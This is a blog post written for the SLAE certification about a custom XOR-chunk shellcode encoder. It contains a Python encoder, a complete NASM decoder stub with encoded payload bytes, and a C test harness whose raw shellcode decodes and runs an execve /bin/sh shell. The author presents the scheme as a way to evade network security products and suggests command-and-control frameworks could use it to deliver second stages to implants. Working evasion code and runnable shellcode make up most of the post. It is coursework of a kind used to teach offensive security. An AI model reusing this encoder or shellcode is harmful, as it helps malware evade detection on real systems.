This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
https://www.pentesteracademy.com/course?id=7
Student ID: PA-30398
The source code for this assignment is stored at the following link: rbctee/SlaeExam.
Within the directory you can find the following files:
encoder.py
Writing an encoding scheme is pretty easy: you can simply apply the NOT operation to all the bytes and call it a day.
Although very basic, it's pretty good in terms of size: if you were to encode a 40-byte shellcode, the encoded version would probably be around 55 bytes.
Nonetheless, there are a few drawbacks:
If the shellcode contains 0xff bytes, after the NOT operation they will become 0x00 bytes.
It isn't strong enough from an evasion perspective.
For this reason, while trying to come up with a new encoding scheme, I decided to focus on the two key points above, i.e., managing NULL bytes and being strong enough from an evasion perspective.
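The NULL-byte drawback of the NOT-based scheme can be seen with a short Python sketch. The function name `not_encode` and the four-byte sample payload are only illustrative and are not part of the original script.

```python
def not_encode(shellcode: bytes) -> bytes:
    """Apply a bitwise NOT to every byte, keeping only the low 8 bits."""
    return bytes(~b & 0xFF for b in shellcode)


# Hypothetical sample payload containing a 0xff byte in third position
sample = bytes([0x31, 0xC0, 0xFF, 0xD0])
encoded = not_encode(sample)

print(encoded.hex())    # ce3f002f
print(0x00 in encoded)  # True: the 0xff byte became a NULL byte
```

Applying `not_encode` twice returns the original bytes, which is why the decoder for such a scheme is so small.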
The encoding scheme I came up with can be summarized in the following four steps:
Once the encoding scheme was completed on a theoretical level, I decided to implement it in the programming language I was most comfortable with: Python.
If these functions seem familiar to you, that may be due to the fact I'm reusing the script I've written for the fourth assignment of the SLAE32 exam.
I'm not going to comment on the whole script; instead, I'll describe some of the choices behind the encoding function:
import random

# chunks() and encode_chunk() are helper functions defined elsewhere in encoder.py

def encode_shellcode(shellcode: bytes) -> bytes:
    global XOR_BYTE

    encoded_shellcode = bytearray()

    # first pass: XOR every byte with a single random, non-zero key
    XOR_BYTE = random.choice(range(1, 256))
    print(f"[+] Xoring bytes with the byte {hex(XOR_BYTE)}")

    for b in shellcode:
        encoded_shellcode.append(b ^ XOR_BYTE)

    print(f"[+] Size of intermediate encoded shellcode is {len(encoded_shellcode)}")

    # pad with NULL bytes so the length is a multiple of the chunk size (7)
    if (len(encoded_shellcode) % 7) != 0:
        print(f"[+] Adding padding to shellcode")
        num_pad_bytes = 7 - (len(encoded_shellcode) % 7)
        for x in range(num_pad_bytes):
            encoded_shellcode.append(0)
    else:
        print(f"[+] No need to add padding to the shellcode")

    print(f"[+] Slicing the shellcode into chunks of 7 bytes")
    bytes_chunks = list(chunks(encoded_shellcode, 7))

    # second pass: encode each 7-byte chunk with its own key
    encoded_shellcode = bytearray()
    for c in bytes_chunks:
        encoded_chunk = encode_chunk(c)
        encoded_shellcode.extend(encoded_chunk)

    print(f"[+] Finished encoding chunks")
    return encoded_shellcode
First, it encodes each byte of the shellcode through the XOR operation. The XOR key in this case is a single byte chosen at random.
Next, the function checks the length of the shellcode, adding NULL bytes at the end in case the length is not a multiple of 7, which is the size I chose for the chunks.
After that, the shellcode is divided into chunks, each of them XOR-encoded with a random byte which must not be already present in the chunk, in order to avoid NULL bytes in the final encoded shellcode.
This XOR byte is prepended to the chunk, thus obtaining a QWORD (8 bytes).
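The helpers `chunks` and `encode_chunk` are not shown in this post, so the following is only a minimal sketch of how the per-chunk step described above could look. The bodies below, and the `decode_chunk` helper, are assumptions of mine rather than the code from encoder.py.

```python
import random
from typing import Iterator

CHUNK_SIZE = 7  # chunk size chosen in the post


def chunks(data: bytes, size: int = CHUNK_SIZE) -> Iterator[bytes]:
    """Yield consecutive slices of `size` bytes (assumed helper)."""
    for i in range(0, len(data), size):
        yield bytes(data[i:i + size])


def encode_chunk(chunk: bytes) -> bytes:
    """XOR a chunk with a random key and prepend the key (assumed helper)."""
    # Candidate keys are non-zero bytes that do not occur in the chunk,
    # so neither the key itself nor any XORed byte can be 0x00.
    candidates = [k for k in range(1, 256) if k not in chunk]
    key = random.choice(candidates)
    return bytes([key]) + bytes(b ^ key for b in chunk)


def decode_chunk(encoded: bytes) -> bytes:
    """Reverse encode_chunk: the first byte is the key."""
    key = encoded[0]
    return bytes(b ^ key for b in encoded[1:])


# A chunk that ends with padding (NULL) bytes still encodes without NULLs
sample_chunk = bytes([0x0F, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00])
encoded = encode_chunk(sample_chunk)
print(len(encoded), 0x00 in encoded)
```

Since a chunk holds at most 7 distinct values, there are always at least 248 candidate keys to choose from.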
Initially, while I was pondering the details of the encoding scheme, I chose 8 as the size of the chunks because I was thinking of loading chunks into registers.
Nonetheless, I decided against that idea since the decoder would have become more complex: to extract the prepended byte I would have had to rotate the other bytes a few times.
To calculate the size of the encoded shellcode, you can use this formula:
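def f(x):
    # round x up to the next multiple of 7 (no padding is added when x is
    # already a multiple of 7), then count 8 encoded bytes per 7-byte chunk
    return ((x + 6) // 7) * 8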
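As a worked example of the size calculation, the sketch below counts the chunks explicitly, assuming (as in `encode_shellcode`) that padding is added only when the length is not a multiple of 7. The name `encoded_size` is illustrative.

```python
import math

CHUNK_SIZE = 7          # payload bytes per chunk
ENCODED_CHUNK_SIZE = 8  # one prepended XOR byte + 7 payload bytes


def encoded_size(shellcode_length: int) -> int:
    """Size of the encoded shellcode, excluding the decoder stub."""
    num_chunks = math.ceil(shellcode_length / CHUNK_SIZE)
    return num_chunks * ENCODED_CHUNK_SIZE


for length in (30, 35, 40):
    print(length, "->", encoded_size(length))
# 30 -> 40
# 35 -> 40
# 40 -> 48
```

A 40-byte shellcode is padded to 42 bytes (6 chunks) and so encodes to 48 bytes, to which the size of the decoder must be added.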
Before continuing to the decoder, I think it's important to add a few notes regarding the features of the encoder.
The script uses a NASM template (by default loaded from the file decoder_template.txt) in order to dynamically generate the final decoder program.
I chose this approach to avoid adding too many instructions to the decoder; initially the length of the decoder was around 100 bytes when it included the routine for retrieving the length of the encoded shellcode.
The value of the argument OUTPUT_DECODER is the final decoder program, which you can then assemble to get the final shellcode.
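To give an idea of what template-based generation can look like, here is a minimal sketch using Python's `string.Template`. The placeholder names (`$length`, `$xor_byte`, `$encoded_bytes`), the three-line template fragment, and the function `render_decoder` are all hypothetical; the real decoder_template.txt may be organised quite differently.

```python
from string import Template

# Hypothetical fragment of a decoder template; the placeholder names
# are assumptions, not the ones used by the actual script.
TEMPLATE = Template(
    "    add cl, $length\n"
    "    xor bl, $xor_byte\n"
    "encoded: db $encoded_bytes\n"
)


def render_decoder(encoded: bytes, xor_byte: int) -> str:
    """Fill the template with values that are only known at encoding time."""
    return TEMPLATE.substitute(
        length=len(encoded),
        xor_byte=hex(xor_byte),
        encoded_bytes=",".join(hex(b) for b in encoded),
    )


print(render_decoder(bytes([0x50, 0x6D, 0x95]), 0x0C))
```

Hard-coding the length and the XOR byte this way keeps the decoder free of any routine that would have to compute them at run time.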
As for the decoder, it is a little over 50 bytes long, which is too large for exploits where size is a vital factor, e.g., buffer overflows or egghunters.
However, in my opinion it's good enough for bigger payloads; think of situations in which there are Network Security products scanning the network traffic.
This encoding scheme could be useful to Command & Control frameworks for sending second stages or shellcodes to their implants.
The decoder discussed in this paragraph was generated with a polymorphic stack-based execve shellcode I developed while taking the course.
Here's the full source code of the decoder program:
; Author: Robert C. Raducioiu

global _start

section .text

_start:

    ; clear RCX
    xor ecx, ecx

    jmp short CallShellcode

Shellcode:

    ; get the address of the encoded shellcode using
    ; the JMP-CALL-POP technique
    pop rsi

    ; statically set the size of the shellcode
    add cl, 80

    ; save the base address of the shellcode in RDX
    push rsi
    pop rdx

    ; push to the stack for later use
    push rdx

    ; skip the next routine
    jmp short LoopDecodeSkip

LoopDecode:

    ; increase registers to step to the next chunk
    add rsi, 8
    add rdx, 7

LoopDecodeSkip:

    ; clear RAX
    xor eax, eax

    ; get the XOR byte of the chunk and XOR it
    ; with the XOR byte generated initially
    mov bl, BYTE [rsi]
    xor bl, 0xc

CopyDecodedByte:

    ; step to the next encoded byte
    add al, 1

    ; decode the encoded byte
    mov bh, BYTE [rsi + rax]
    xor bh, bl

    ; replace the encoded byte with the decoded one
    mov BYTE [rdx + rax], bh

    ; if RAX is 7 it means we decoded 7 bytes
    ; it's time to go to the next chunk
    cmp al, 7
    jz LoopDecode

    ; if RCX != 0 then go back to decoding
    loop CopyDecodedByte

RunShellcode:

    ; skip the first byte (XOR byte)
    pop rax
    add al, 1

    ; run the decoded shellcode
    call rax

CallShellcode:

    call Shellcode
encoded: db 0x50,0x6d,0x95,0x14,0xab,0xbd,0x14,0xd5,0xd1,0x89,0xf9,0x25,0x95,0x5e,0x31,0xd5,0x27,0x7f,0x71,0x63,0x95,0x70,0x2a,0x20,0x14,0x4,0x43,0x54,0x9,0x2,0x50,0xa3,0x13,0x6b,0x7c,0x7d,0x6d,0x6b,0x7c,0x7d,0xe1,0x9f,0xa5,0xdc,0x33,0xbb,0xb9,0xb2,0x13,0x4e,0x57,0x96,0x63,0x3b,0xe7,0x57,0x1c,0x93,0xfc,0x18,0x58,0x9d,0x24,0x34,0x6b,0xe4,0xa7,0x5b,0x2f,0x98,0xaf,0x68,0x49,0x40,0x49,0x49,0x49,0x49,0x49,0x49
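The arithmetic performed by the decoding loop can be modelled in a few lines of Python. This is only a sketch of the byte-level transformation (the function name `decode` is mine); it does not model the registers, the in-place writes, or the LOOP counter. The sample input is the first 8-byte chunk of the `encoded` label above, and `0x0c` is the value used by `xor bl, 0xc`.

```python
def decode(encoded: bytes, xor_byte: int) -> bytes:
    """Model of the decoder: undo the per-chunk and the global XOR."""
    decoded = bytearray()
    for i in range(0, len(encoded), 8):
        chunk = encoded[i:i + 8]
        # mov bl, [rsi] / xor bl, <XOR byte>: combine both keys into one
        key = chunk[0] ^ xor_byte
        # mov bh, [rsi + rax] / xor bh, bl: decode the 7 payload bytes
        decoded.extend(b ^ key for b in chunk[1:])
    return bytes(decoded)


first_chunk = bytes([0x50, 0x6D, 0x95, 0x14, 0xAB, 0xBD, 0x14, 0xD5])
print(decode(first_chunk, 0x0C).hex())  # 31c948f7e14889
```

Combining the two keys up front is what lets the assembly decode each byte with a single XOR.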
I won't describe each instruction, mostly because almost every one has a comment, but I'm going to list some key points:
It uses the JMP-CALL-POP technique to retrieve the address of the encoded shellcode.
It uses the register CL to determine the length of the shellcode. The value is statically set by the encoder; in case it's greater than 256, it uses the register CX.
It uses the LOOP instruction to check if the counter register reached 0, and hence to determine if all the encoded bytes were decoded.
As mentioned previously, I tested the program with a polymorphic version of the stack-based execve shellcode.
For the final Proof of Concept, I chose the simple version of the stack-based execve shellcode, which you can get here.
After that, I assembled the file decoder.nasm using nasm and retrieved the final shellcode using objcopy. Below is the C program I used to test the decoder shellcode:
#include <stdio.h>
#include <string.h>

// Previously I made the mistake of initializing the buffer 'code' outside of main.
// I say mistake because it would trigger a Segmentation Fault, due to the memory
// region not being executable.
// If you declare it inside main, it is stored on the stack, which is executable only
// if the program is built with an executable stack (e.g. gcc's -z execstack option).
int main(int argc, char* argv[])
{
    unsigned char code[] = \
"\x31\xc9\xeb\x2d\x5e\x80\xc1\x28\x56\x5a\x52\xeb\x08\x48\x83\xc6\x08\x48\x83\xc2\x07\x31\xc0\x8a\x1e\x80\xf3\xd1\x04\x01\x8a\x3c\x06\x30\xdf\x88\x3c\x02\x3c\x07\x74\xe3\xe2\xf0\x58\x04\x01\xff\xd0\xe8\xce\xff\xff\xff\x4e\xae\x5f\xcf\xd7\x16\x7d\xd7\xcd\xa7\x33\x7e\x75\x72\x33\x33\x6d\xcf\xd4\xef\xf4\x35\x5b\xec\x14\x92\x8d\x4c\x23\x46\x05\xfe\x7d\xa3\xa9\x7d\x7d\x7d\x7d\x7d";
    printf("[+] Shellcode length: %d\n", (int)strlen((const char *)code));
    int (*ret)() = (int(*)())code;
    ret();
}
Running the program above, I successfully managed to decode the encoded shellcode and execute the shell /bin/sh.
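For completeness, the raw bytes extracted with objcopy have to be turned into a C string literal before they can be pasted into the test program. The helper below is one possible way to do it, not necessarily the one used for this post; the name `to_c_literal` is an assumption, and the sample input is just the first four bytes of the shellcode shown above.

```python
def to_c_literal(raw: bytes) -> str:
    """Format raw bytes as a C string literal of \\xNN escapes."""
    return '"' + "".join(f"\\x{b:02x}" for b in raw) + '"'


def has_null_bytes(raw: bytes) -> bool:
    """strlen() in the test program stops at the first NULL byte."""
    return 0x00 in raw


sample = bytes([0x31, 0xC9, 0xEB, 0x2D])
print(to_c_literal(sample))    # "\x31\xc9\xeb\x2d"
print(has_null_bytes(sample))  # False
```

Checking for NULL bytes at this stage is a cheap way to confirm that the length printed by the test program covers the whole shellcode.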